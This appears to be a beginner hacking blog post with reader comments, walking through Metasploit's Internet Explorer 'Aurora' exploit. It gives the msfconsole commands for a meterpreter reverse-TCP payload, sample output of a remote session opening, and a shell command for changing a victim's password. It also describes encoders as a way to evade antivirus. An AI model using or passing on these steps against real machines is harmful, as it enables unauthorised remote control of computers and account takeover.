Before continuing read our disclaimer
Metasploit is an Penetration testing tool by Rapid7
Download Metasploit here
Metasploit Download - Rapid7
Now install it .
What is Metasploit?
It is an exploitation framwork , written in Ruby.
It has a wide range of pre developed exploits and few usefull application like "nmap" attached with it.It was primarily developed for penetration testing but now it has come out to be must needed tool for hackers
So lets start hacking!
start msfconsole Start>Search>msfconsole
or in Linux ./msfconsole
Start by typing
Code:
helpSome stuff abt metasploit.
Exploits are methods by which u can get into another system
Payloads are stuff that are injected into other computers when u exploit them
What payloads can do?
They can execute commands or a special shell can function as a RAT(meterpreter).
What are encoders?
Encoders prevent detection by Anti-viruses
Okay now to the serious stuff!
in the console , u can exploit other computers , here i will show abt the famous internet explorer Aurora hack .
#1 Windows IE Aurora
type in the following commands
Code:
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set LHOST (your IP)
msf exploit(ms10_002_aurora) > set URIPATH /
msf exploit(ms10_002_aurora) > exploit
Code:
[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.Open Internet Explorer on a vulnerable machine and enter the Local IP URL(i.e the Local IP that metasploit displayed here it is http://192.168.0.151:8080/) into the browser. If the exploit succeeds, you should see a new session in the Metasploit .
Console:
Code:
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)
msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: WINXP\PakH3X0r
Code:
shellP.s:- to change passwords
Code:
net user [user_name] [new_password]


 
 
 
 
 
 
 
3 comments:
Is it through the metasploit that the cmds are done
Meta Sploit is not a CMD i look like but it have different commands
Also check how to convert Windows & to Windows * http://h4ckcorner.blogspot.com/2011/09/how-to-get-windows-8-interface.html
Post a Comment